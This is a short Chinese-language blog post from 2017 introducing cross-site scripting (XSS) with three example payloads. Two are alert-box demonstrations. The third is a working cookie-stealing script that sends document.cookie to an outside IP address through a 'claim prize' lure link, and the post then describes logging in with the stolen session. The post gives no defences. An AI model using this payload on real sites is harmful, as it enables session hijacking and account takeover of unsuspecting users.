跨站脚本攻击介绍

xss简介

跨站脚本在英文中称为Cross-Site Scripting,缩写为CSS。但是,由于与层叠样式表 (Cascading Style Sheets)缩写同名,特将跨站脚本缩写为XSS。
跨站脚本,顾名思义,就是恶意攻击者利用网站漏洞往Web页面里插入恶意代码 例如

案例一

现在假设攻击者在论坛网站A的一个帖子进行了如下回复:

<script>alert("hello world")</script>

如果网站未进行相关的防御,那么其他人浏览帖子的人就会出现hello world 弹窗,这种危害性并不大。

案例二

但是我们可以通过xss获取用户的cookie,并查出sessionID。例如

<script>alert(document.cookie)</script>

你可以把你拿来的cookie定向到另一个页面,通过诱惑性的标题诱导用户点击此连接,然后就调到另外的网站

<script type="text/javascript">
function send()
{
	var cookie = document.cookie;  
    window.location.href = "http://10.33.56.43/attackPage.asp?cookies=" + cookie;  
}  
</script> 
<a onClick="send()"><u>领奖</u></a>

用户的cookie我也拿到了,如果服务端session没有设置过期的话,我以后甚至拿这个cookie而不需用户名密码,就可以以这个用户的身份登录成功,结合csrf,来搞破坏

posted @ 2017-08-16 22:25  liu_roy  阅读(401)  评论(0编辑  收藏  举报